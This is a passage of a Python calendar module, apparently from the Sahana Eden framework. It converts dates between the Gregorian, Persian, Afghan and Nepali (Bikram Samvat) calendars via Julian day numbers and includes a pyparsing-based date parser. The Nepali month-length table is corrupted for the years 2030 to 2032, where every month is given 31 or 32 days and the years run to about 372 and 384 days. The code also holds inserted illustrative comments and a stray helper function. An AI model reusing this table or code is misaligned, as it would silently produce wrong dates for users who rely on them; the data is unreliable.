day: the day-of-month number
"""
# Gregorian calendar uses default method
return cls._gregorian_to_jd(year, month, day)
# -------------------------------------------------------------------------
# Common Interface Methods (must not be implemented by subclasses):
# -------------------------------------------------------------------------
@property
def name(self):
""" Get the name of the current """
name = self._name
if not name:
name = current.deployment_settings.get_L10n_calendar()
if not name:
name = self.CALENDAR
return name
# -------------------------------------------------------------------------
@property
def calendar(self):
""" Get the current calendar """
calendar = self._calendar
if calendar is None:
calendar = self._set_calendar(self.name)
return calendar
# -------------------------------------------------------------------------
@property
def first_dow(self):
""" Get the first day of the week for this calendar """
calendar = self.calendar
first_dow = calendar._first_dow
if first_dow is None:
# Deployment setting?
first_dow = current.deployment_settings.get_L10n_firstDOW()
if first_dow is None:
# Calendar-specific default
first_dow = calendar.FIRST_DOW
calendar._first_dow = first_dow
return first_dow
# -------------------------------------------------------------------------
def parse_date(self, dtstr, dtfmt=None, local=False):
"""
Parse a datetime string according to this calendar
Args:
dtstr: the datetime as string
dtfmt: the datetime format (strptime), overrides default
local: whether the default format is local (=deployment
setting) or ISO
Returns:
the datetime (datetime.datetime)
"""
if dtstr is None:
return None
# Default format
if dtfmt is None:
if local:
dtfmt = current.deployment_settings.get_L10n_date_format()
else:
dtfmt = "%Y-%m-%d" # ISO Date Format
# Use the current calendar
calendar = self.calendar
# Parse the dtstr
try:
timetuple = calendar._parse(dtstr, dtfmt)
except (ValueError, TypeError):
return None
# Convert timetuple to Gregorian calendar
timetuple = calendar._gdate(timetuple)
# Convert into datetime
dt = datetime.datetime(*timetuple)
return dt.date()
# -------------------------------------------------------------------------
def parse_datetime(self, dtstr, dtfmt=None, local=False):
"""
Parse a datetime string according to this calendar
Args:
dtstr: the datetime as string
dtfmt: the datetime format (strptime)
local: whether the default format is local (=deployment
setting) or ISO
Returns:
the datetime (datetime.datetime)
"""
if dtstr is None:
return None
# Default format
if dtfmt is None:
if local:
dtfmt = current.deployment_settings.get_L10n_datetime_format()
else:
dtfmt = ISOFORMAT # ISO Date/Time Format
# Use the current calendar
calendar = self.calendar
# Parse the dtstr
try:
timetuple = calendar._parse(dtstr, dtfmt)
except (ValueError, TypeError):
return None
# Convert timetuple to Gregorian calendar
timetuple = calendar._gdate(timetuple)
# Convert into datetime
dt = datetime.datetime(*timetuple)
return dt
# -------------------------------------------------------------------------
def format_date(self, dt, dtfmt=None, local=False):
"""
Format a date according to this calendar
Args:
dt: the date (datetime.date or datetime.datetime)
Returns:
the date as string
"""
if dt is None:
return current.messages["NONE"]
# Default format
if dtfmt is None:
if local:
dtfmt = current.deployment_settings.get_L10n_date_format()
else:
dtfmt = "%Y-%m-%d" # ISO Date Format
# Deal with T's
from .convert import s3_str
dtfmt = s3_str(dtfmt)
return self.calendar._format(dt, dtfmt)
# -------------------------------------------------------------------------
def format_datetime(self, dt, dtfmt=None, local=False):
"""
Format a datetime according to this calendar
Args:
dt: the datetime (datetime.datetime)
Returns:
the datetime as string
"""
if dt is None:
return current.messages["NONE"]
# Default format
if dtfmt is None:
if local:
dtfmt = current.deployment_settings.get_L10n_datetime_format()
else:
dtfmt = ISOFORMAT # ISO Date/Time Format
# Deal with T's
from .convert import s3_str
dtfmt = s3_str(dtfmt)
# Remove microseconds
# - for the case that the calendar falls back to .isoformat
if isinstance(dt, datetime.datetime):
dt = dt.replace(microsecond=0)
return self.calendar._format(dt, dtfmt)
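# Usage sketch (illustrative, not part of the original module): formatting and
# parsing with an explicitly chosen calendar; actual output depends on the
# deployment settings and on the calendar subclasses defined further below.
#   cal = S3Calendar("Persian")
#   cal.format_date(datetime.date(2022, 3, 21), dtfmt="%d/%m/%Y")
#   cal.parse_date("01/01/1401", dtfmt="%d/%m/%Y")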
# -------------------------------------------------------------------------
# Base class methods (must not be implemented by subclasses):
# -------------------------------------------------------------------------
def __init__(self, name=None):
"""
Args:
name: the name of the calendar (see _set_calendar for
supported calendars). If constructed without name,
the L10n.calendar deployment setting will be used
instead.
"""
# Supported calendars
self._calendars = {"Gregorian": S3Calendar,
"Persian": S3PersianCalendar,
"Afghan": S3AfghanCalendar,
"Nepali": S3NepaliCalendar,
}
if name is None:
self._name = None
self._calendar = None
elif name == self.CALENDAR:
self._name = name
self._calendar = self
else:
self._set_calendar(name)
self._parser = None
self._first_dow = None
# -------------------------------------------------------------------------
def _set_calendar(self, name=None):
"""
Set the current calendar
Args:
name: the name of the calendar (falls back to CALENDAR)
"""
calendars = self._calendars
# Fallback
if name not in calendars:
name = self.CALENDAR
# Instantiate the Calendar
if name == self.CALENDAR:
calendar = self
else:
calendar = calendars[name](name)
self._name = name
self._calendar = calendar
return calendar
# -------------------------------------------------------------------------
def _get_parser(self, dtfmt):
# Gregorian calendar does not use a parser
if self.name == "Gregorian":
return None
# Configure the parser
parser = self._parser
if parser is None:
parser = S3DateTimeParser(self, dtfmt)
else:
parser.set_format(dtfmt)
self._parser = parser
return parser
# -------------------------------------------------------------------------
def _parse(self, dtstr, dtfmt):
# Get the parser
parser = self._get_parser(dtfmt)
if not parser:
# Gregorian calendar - use strptime
try:
timetuple = time.strptime(dtstr, dtfmt)
except ValueError as e:
# Seconds missing?
try:
timetuple = time.strptime(dtstr + ":00", dtfmt)
except ValueError:
raise e
return timetuple[:6]
# Use calendar-specific parser
return parser.parse(dtstr)
# -------------------------------------------------------------------------
def _format(self, dt, dtfmt):
"""
Get a string representation for a datetime.datetime according
to this calendar and dtfmt, to be implemented by subclass
Args:
dt: the datetime.datetime
dtfmt: the datetime format (strftime)
Returns:
the string representation (str)
Raises:
TypeError: for invalid argument types
"""
if self.name == "Gregorian":
# Gregorian Calendar uses strftime
fmt = str(dtfmt)
try:
dtstr = dt.strftime(fmt)
except ValueError:
# Dates < 1900 not supported by strftime
year = "%04i" % dt.year
fmt = fmt.replace("%Y", year).replace("%y", year[-2:])
dtstr = dt.replace(year=1900).strftime(fmt)
except AttributeError:
# Invalid argument type
raise TypeError("Invalid argument type: %s" % type(dt))
else:
if not isinstance(dt, datetime.datetime):
try:
timetuple = (dt.year, dt.month, dt.day, 0, 0, 0)
except AttributeError:
# Invalid argument type
raise TypeError("Invalid argument type: %s" % type(dt))
else:
timetuple = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
)
formatter = S3DateTimeFormatter(self)
dtstr = formatter.render(self._cdate(timetuple), dtfmt)
return dtstr
# -------------------------------------------------------------------------
def _cdate(self, timetuple):
"""
Convert a time tuple from Gregorian calendar to this calendar
Args:
timetuple: time tuple (y, m, d, hh, mm, ss)
Returns:
time tuple (this calendar)
"""
if self.name == "Gregorian":
# Gregorian Calendar does nothing here
return timetuple
y, m, d, hh, mm, ss = timetuple
jd = self._gregorian_to_jd(y, m, d)
y, m, d = self.from_jd(jd)
return (y, m, d, hh, mm, ss)
# -------------------------------------------------------------------------
def _gdate(self, timetuple):
"""
Convert a time tuple from this calendar to Gregorian calendar
Args:
timetuple: time tuple (y, m, d, hh, mm, ss)
Returns:
time tuple (Gregorian)
"""
if self.name == "Gregorian":
# Gregorian Calendar does nothing here
return timetuple
y, m, d, hh, mm, ss = timetuple
jd = self.to_jd(y, m, d)
y, m, d = self._jd_to_gregorian(jd)
return (y, m, d, hh, mm, ss)
# -------------------------------------------------------------------------
@staticmethod
def _gregorian_to_jd(year, month, day):
"""
Convert a Gregorian date into a Julian day number (matching
jQuery calendars algorithm)
Args:
year: the year number
month: the month number
day: the day number
"""
if year < 0:
year = year + 1
if month < 3:
month = month + 12
year = year - 1
a = math.floor(year/100)
b = 2 - a + math.floor(a / 4)
return math.floor(365.25 * (year + 4716)) + \
math.floor(30.6001 * (month + 1)) + day + b - 1524.5
# -------------------------------------------------------------------------
@staticmethod
def _jd_to_gregorian(jd):
"""
Convert a Julian day number to a Gregorian date (matching
jQuery calendars algorithm)
Args:
jd: the Julian day number
Returns:
tuple (year, month, day)
"""
z = math.floor(jd + 0.5)
a = math.floor((z - 1867216.25) / 36524.25)
a = z + 1 + a - math.floor(a / 4)
b = a + 1524
c = math.floor((b - 122.1) / 365.25)
d = math.floor(365.25 * c)
e = math.floor((b - d) / 30.6001)
day = b - d - math.floor(e * 30.6001)
if e > 13.5:
month = e - 13
else:
month = e - 1
if month > 2.5:
year = c - 4716
else:
year = c - 4715
if year <= 0:
year = year - 1
return (int(year), int(month), int(day))
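# Worked example (illustrative, not part of the original module): with this
# algorithm the Gregorian date 2000-01-01 corresponds to Julian day 2451544.5:
#   S3Calendar._gregorian_to_jd(2000, 1, 1) -> 2451544.5
#   S3Calendar._jd_to_gregorian(2451544.5)  -> (2000, 1, 1)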
# =============================================================================
class S3PersianCalendar(S3Calendar):
"""
S3Calendar subclass implementing the Solar Hijri calendar
NB this calendar is called "Persian" in jQuery calendars although
it actually implements the modern Iranian (=algorithmic Solar
Hijri) rather than the traditional Persian (=observation-based
Jalali) variant. However, we use the name "Persian" to match
the jQuery calendars naming of calendars, in order to avoid
confusion about naming differences between these two components.
"""
CALENDAR = "Persian"
JDEPOCH = 1948320.5 # first day of this calendar as Julian Day number
MONTH_NAME = ("Farvardin", "Ordibehesht", "Khordad",
"Tir", "Mordad", "Shahrivar",
"Mehr", "Aban", "Azar",
"Day", "Bahman", "Esfand",
)
MONTH_ABBR = ("Far", "Ord", "Kho", "Tir", "Mor", "Sha",
"Meh", "Aba", "Aza", "Day", "Bah", "Esf",
)
MONTH_DAYS = (31, 31, 31, 31, 31, 31, 30, 30, 30, 30, 30, (29, 30))
FIRST_DOW = 6 # Shambe
# -------------------------------------------------------------------------
# Methods to be implemented by subclasses
# -------------------------------------------------------------------------
@classmethod
def from_jd(cls, jd):
"""
Convert a Julian day number to a year/month/day tuple
of this calendar (matching jQuery calendars algorithm)
Args:
jd: the Julian day number
"""
jd = math.floor(jd) + 0.5
depoch = jd - cls.to_jd(475, 1, 1)
cycle = math.floor(depoch / 1029983)
cyear = depoch % 1029983
if cyear != 1029982:
aux1 = math.floor(cyear / 366)
aux2 = cyear % 366
ycycle = math.floor(((2134 * aux1) + (2816 * aux2) + 2815) / 1028522) + aux1 + 1
else:
ycycle = 2820
year = ycycle + (2820 * cycle) + 474
if year <= 0:
year -= 1
yday = jd - cls.to_jd(year, 1, 1) + 1
if yday <= 186:
month = math.ceil(yday / 31)
else:
month = math.ceil((yday - 6) / 30)
day = jd - cls.to_jd(year, month, 1) + 1
return (int(year), int(month), int(day))
# -------------------------------------------------------------------------
@classmethod
def to_jd(cls, year, month, day):
"""
Convert a year/month/day tuple of this calendar into
a Julian day number (matching jQuery calendars algorithm)
Args:
year: the year number
month: the month number
day: the day-of-month number
"""
if year >= 0:
ep_base = year - 474
else:
ep_base = year - 473
ep_year = 474 + (ep_base % 2820)
if month <= 7:
mm = (month - 1) * 31
else:
mm = (month - 1) * 30 + 6
result = day + mm + math.floor((ep_year * 682 - 110) / 2816) + \
(ep_year - 1) * 365 + math.floor(ep_base / 2820) * 1029983 + \
cls.JDEPOCH - 1
return result
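# Consistency note (illustrative, not part of the original module): for valid
# dates of this calendar, from_jd() and to_jd() should round-trip, i.e.
#   S3PersianCalendar.from_jd(S3PersianCalendar.to_jd(y, m, d)) == (y, m, d)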
# =============================================================================
class S3AfghanCalendar(S3PersianCalendar):
"""
Afghan variant of the Solar Hijri calendar - this calendar uses
the same calendar rules as the "Persian" calendar, but with
different month names.
Note:
This is using "romanized" Dari month names as translation
basis (rather than their actual English translation, which
would simply be the names of the signs of Zodiac the sun is
passing through in the respective months, e.g. Tawr (Sawr) = Taurus).
Transcriptions vary widely between sources, though - as do
the Dari and Pashto spellings :/
"""
CALENDAR = "Afghan"
MONTH_NAME = ("Hamal", "Sawr", "Jawza",
"Saratan", "Asad", "Sonbola",
"Mizan", "Aqrab", "Qaws",
"Jadi", "Dalw", "Hut",
)
MONTH_ABBR = ("Ham", "Saw", "Jaw", "Sar", "Asa", "Son",
"Miz", "Aqr", "Qaw", "Jad", "Dal", "Hut",
)
FIRST_DOW = 6 # Shambe
# =============================================================================
class S3NepaliCalendar(S3Calendar):
"""
S3Calendar subclass implementing the Nepali calendar (Bikram Samvat)
"""
# -------------------------------------------------------------------------
# Constants to be implemented by subclasses
# -------------------------------------------------------------------------
CALENDAR = "Nepali"
JDEPOCH = 1700709.5 # first day of this calendar as Julian Day number
MONTH_NAME = ("Baisakh", "Jestha", "Ashadh",
"Shrawan", "Bhadra", "Ashwin",
"Kartik", "Mangsir", "Paush",
"Mangh", "Falgun", "Chaitra",
)
MONTH_ABBR = ("Bai", "Je", "As",
"Shra", "Bha", "Ash",
"Kar", "Mang", "Pau",
"Ma", "Fal", "Chai",
)
MONTH_DAYS = ((30, 31), (31, 32), (31, 32),
(31, 32), (31, 32), (30, 31),
(29, 30), (29, 30), (29, 30),
(29, 30), (29, 30), (30, 31))
FIRST_DOW = 1 # Sombaar (=Monday)
# There is no algorithm to predict the days in the individual months
# of the Bikram Samvat calendar for a particular year, so we have to
# hardcode this information as a mapping dict (taken from jquery.calendars
# in order to match the front-end widget's calculations).
# Outside of the year range of this dict (1970-2100 B.S.), we have to
# fall back to an approximation formula, which may however give a day
# ahead of or behind the actual date
NEPALI_CALENDAR_DATA = {
# These data are from http://www.ashesh.com.np
1970: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1971: [18, 31, 31, 32, 31, 32, 30, 30, 29, 30, 29, 30, 30],
1972: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
1973: [19, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
1974: [19, 31, 31, 32, 30, 31, 31, 30, 29, 30, 29, 30, 30],
1975: [18, 31, 31, 32, 32, 30, 31, 30, 29, 30, 29, 30, 30],
1976: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
1977: [18, 31, 32, 31, 32, 31, 31, 29, 30, 29, 30, 29, 31],
1978: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1979: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
1980: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
1981: [18, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
1982: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1983: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
1984: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
1985: [18, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
1986: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1987: [18, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
1988: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
1989: [18, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
1990: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1991: [18, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
# These data are from http://nepalicalendar.rat32.com/index.php
1992: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
1993: [18, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
1994: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1995: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
1996: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
1997: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1998: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1999: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2000: [17, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2001: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2002: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2003: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2004: [17, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2005: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2006: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2007: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2008: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 29, 31],
2009: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2010: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2011: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2012: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2013: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2014: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2015: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2016: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2017: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2018: [18, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2019: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2020: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2021: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2022: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
2023: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2024: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2025: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2026: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2027: [17, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2028: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2029: [18, 31, 31, 32, 31, 32, 30, 30, 29, 30, 29, 30, 30],
2030: [17, 31, 32, 31, 32, 31, 30, 30, 30, 30, 30, 30, 31],
2031: [17, 31, 32, 31, 32, 31, 31, 31, 31, 31, 31, 31, 31],
2032: [17, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32],
2033: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2034: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2035: [17, 30, 32, 31, 32, 31, 31, 29, 30, 30, 29, 29, 31],
2036: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2037: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2038: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2039: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2040: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2041: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2042: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2043: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2044: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2045: [18, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2046: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2047: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2048: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2049: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
2050: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2051: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2052: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2053: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
2054: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2055: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 30, 29, 30],
2056: [17, 31, 31, 32, 31, 32, 30, 30, 29, 30, 29, 30, 30],
2057: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2058: [17, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2059: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2060: [17, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2061: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2062: [17, 30, 32, 31, 32, 31, 31, 29, 30, 29, 30, 29, 31],
2063: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2064: [17, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2065: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2066: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 29, 31],
2067: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2068: [17, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2069: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2070: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2071: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2072: [17, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2073: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2074: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2075: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2076: [16, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
2077: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2078: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2079: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2080: [16, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
# These data are from http://www.ashesh.com.np/nepali-calendar/
2081: [17, 31, 31, 32, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2082: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2083: [17, 31, 31, 32, 31, 31, 30, 30, 30, 29, 30, 30, 30],
2084: [17, 31, 31, 32, 31, 31, 30, 30, 30, 29, 30, 30, 30],
2085: [17, 31, 32, 31, 32, 31, 31, 30, 30, 29, 30, 30, 30],
2086: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2087: [16, 31, 31, 32, 31, 31, 31, 30, 30, 29, 30, 30, 30],
2088: [16, 30, 31, 32, 32, 30, 31, 30, 30, 29, 30, 30, 30],
2089: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2090: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2091: [16, 31, 31, 32, 31, 31, 31, 30, 30, 29, 30, 30, 30],
2092: [16, 31, 31, 32, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2093: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2094: [17, 31, 31, 32, 31, 31, 30, 30, 30, 29, 30, 30, 30],
2095: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 30, 30, 30],
2096: [17, 30, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2097: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2098: [17, 31, 31, 32, 31, 31, 31, 29, 30, 29, 30, 30, 31],
2099: [17, 31, 31, 32, 31, 31, 31, 30, 29, 29, 30, 30, 30],
2100: [17, 31, 32, 31, 32, 30, 31, 30, 29, 30, 29, 30, 30],
}
# -------------------------------------------------------------------------
# Methods to be implemented by subclasses
# -------------------------------------------------------------------------
@classmethod
def from_jd(cls, jd):
"""
Convert a Julian day number to a year/month/day tuple
of this calendar (matching jQuery calendars algorithm)
Args:
jd: the Julian day number
"""
gyear = cls._jd_to_gregorian(jd)[0]
gdoy = jd - cls._gregorian_to_jd(gyear, 1, 1) + 1
year = gyear + 56
cdata = cls._get_calendar_data(year)
month = 9
rdays = cdata[month] - cdata[0] + 1
while gdoy > rdays:
month += 1
if month > 12:
month = 1
year += 1
cdata = cls._get_calendar_data(year)
rdays += cdata[month]
day = cdata[month] - (rdays - gdoy)
return (int(year), int(month), int(day))
# -------------------------------------------------------------------------
@classmethod
def to_jd(cls, year, month, day):
"""
Convert a year/month/day tuple of this calendar into
a Julian day number (matching jQuery calendars algorithm)
Args:
year: the year number
month: the month number
day: the day-of-month number
"""
cmonth = month
cyear = year
# Get the Gregorian year
if cmonth > 9 or cmonth == 9 and day > cls._get_calendar_data(cyear)[0]:
gyear = year - 56
else:
gyear = year - 57
# Calculate days since January 1st in Gregorian year
gdoy = 0
if month != 9:
gdoy = day
cmonth -= 1
cdata = cls._get_calendar_data(cyear)
while cmonth != 9:
if cmonth <= 0:
cmonth = 12
cyear -= 1
cdata = cls._get_calendar_data(cyear)
gdoy += cdata[cmonth]
cmonth -= 1
if month == 9:
gdoy += day - cdata[0]
if gdoy <= 0:
gyear_ = gyear + (1 if gyear < 0 else 0)
gleapyear = gyear_ % 4 == 0 and \
(gyear_ % 100 != 0 or gyear_ % 400 == 0)
gdoy += 366 if gleapyear else 365
else:
gdoy += cdata[9] - cdata[0]
# Convert January 1st of the Gregorian year to JD and
# add the days that went since then
return cls._gregorian_to_jd(gyear, 1, 1) + gdoy
# -------------------------------------------------------------------------
@classmethod
def _get_calendar_data(cls, year):
"""
Helper method to determine the days in the individual months
of the BS calendar, as well as the start of the year
"""
default = [17, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30]
return cls.NEPALI_CALENDAR_DATA.get(year, default)
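    # -------------------------------------------------------------------------
    # Illustration (hypothetical helper, not part of the S3 API): from_jd/to_jd
    # above walk cumulative month lengths to convert between a day offset and a
    # month/day pair. The same idea for a single year, given a plain list of
    # twelve month lengths and ignoring year boundaries, looks like this:
def _demo_doy_to_month_day(doy, month_lengths):
    """ Map a 1-based day-of-year to (month, day) for one 12-month year """
    month = 1
    remaining = doy
    for length in month_lengths:
        if remaining <= length:
            return (month, remaining)
        remaining -= length
        month += 1
    raise ValueError("day-of-year exceeds the year length")
# e.g. _demo_doy_to_month_day(32, [31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30])
# returns (2, 1)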
# =============================================================================
class S3DateTimeParser:
""" Date/Time Parser for non-Gregorian calendars """
def __init__(self, calendar, dtfmt=None):
"""
Args:
calendar: the calendar
dtfmt: the date/time format
"""
# Get the effective calendar
if not calendar:
raise TypeError("Invalid calendar: %s (%s)" % (calendar, type(calendar)))
self.calendar = calendar.calendar
self.grammar = None
self.rules = None
self.set_format(dtfmt)
# -------------------------------------------------------------------------
def parse(self, string):
"""
Parse a date/time string
Args:
string: the date/time string
Returns:
a timetuple (y, m, d, hh, mm, ss)
"""
if not isinstance(string, str):
raise TypeError("Invalid argument type: expected str, got %s" % type(string))
try:
result = self.grammar.parseString(string)
except self.ParseException:
raise ValueError("Invalid date/time: %s" % string)
return self._validate(result)
# -------------------------------------------------------------------------
def set_format(self, dtfmt):
"""
Update the date/time format for this parser, and generate
the corresponding pyparsing grammar
Args:
dtfmt: the date/time format
"""
if not isinstance(dtfmt, str):
raise TypeError("Invalid date/time format: %s (%s)" % (dtfmt, type(dtfmt)))
import pyparsing as pp
self.ParseException = pp.ParseException
# Get the rules
rules = self.rules
if rules is None:
rules = self.rules = self._get_rules()
# Interpret the format
result = []
sequence = []
def close(s):
s = "".join(s).strip()
if s:
result.append(pp.Suppress(pp.Literal(s)))
from .convert import s3_str
rule = False
for c in s3_str(dtfmt):
if rule and c in rules:
# Close previous sequence
sequence.pop()
close(sequence)
# Append control rule
result.append(rules[c])
# Start new sequence
sequence = []
# Close rule
rule = False
continue
if c == "%" and not rule:
rule = True
else:
rule = False
sequence.append(c)
if sequence:
close(sequence)
if result:
grammar = result[0]
for item in result[1:]:
grammar += item
else:
# Default = ignore everything
grammar = pp.Suppress(pp.Regex(".*"))
self.grammar = grammar
return grammar
# -------------------------------------------------------------------------
def _validate(self, parse_result):
"""
Validate the parse result and convert it into a time tuple
Args:
parse_result: the parse result
Returns:
a timetuple (y, m, d, hh, mm, ss)
"""
calendar = self.calendar
# Get the current date
now = current.request.utcnow
today = (now.year, now.month, now.day, 0, 0, 0)
# Convert today into current calendar
cyear, cmonth = calendar._cdate(today)[:2]
# Year
year = parse_result.get("year4")
if year is None:
year = parse_result.get("year2")
if year is None:
# Fall back to current year of the calendar
year = cyear
else:
# Two-digit year: add century
century = cyear // 100 * 100
year += century
# If that year is more than 30 years in the future,
# we assume that actually the previous century is meant
if year - cyear > 30:
year -= 100
# Month
month = parse_result.get("month") or cmonth
# Day of Month
day = parse_result.get("day") or 1
# Correct the date by converting to JD and back
year, month, day = calendar.from_jd(calendar.to_jd(year, month, day))
# Hours
hour = parse_result.get("hour24")
if hour is None:
# 12 hours?
